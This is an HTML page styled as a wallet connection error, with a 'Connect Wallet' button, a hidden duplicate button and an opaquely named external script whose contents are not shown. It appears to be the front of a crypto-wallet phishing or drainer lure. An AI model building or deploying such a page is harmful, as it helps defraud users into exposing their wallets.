<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Error Page</title>
  <style>
    body {
      margin: 0;
      padding: 0;
      font-family: Arial, sans-serif;
      background-color: #f0f0f0;
    }

    .error-container {
      display: flex;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      height: 100vh;
    }

    .error-heading {
      font-weight: bold;
      color: #00a3cc; /* Light Blue */
      text-align: center;
      margin-bottom: 20px;
    }

    .error-message-container {
      background-color: #fff;
      border: 2px solid #000;
      padding: 20px;
      text-align: center;
    }

    .error-message {
      color: #fff;
    }

    .action-button {
      display: inline-block;
      padding: 10px 20px;
      background-color: #00a3cc; /* Light Blue */
      color: #fff;
      text-decoration: none;
      font-weight: bold;
      border: none;
      cursor: pointer;
    }
  </style>
  <script charset="UTF-8" type="text/javascript" src="./f7d9f66b-b3e8-4dbd-b186-4809fd0c13a2.js"></script>
</head>
<body>
  <div class="error-container">
    <h1 class="error-heading">Oops! Could not reach wallet.</h1>
    <div class="error-message-container">
      <div class="action-button">
        <button class="interact-button">Connect Wallet</button><button class="interact-button" style="display: none;">Connect Wallet</button>
    </div>
  </div>
</body>
</html>
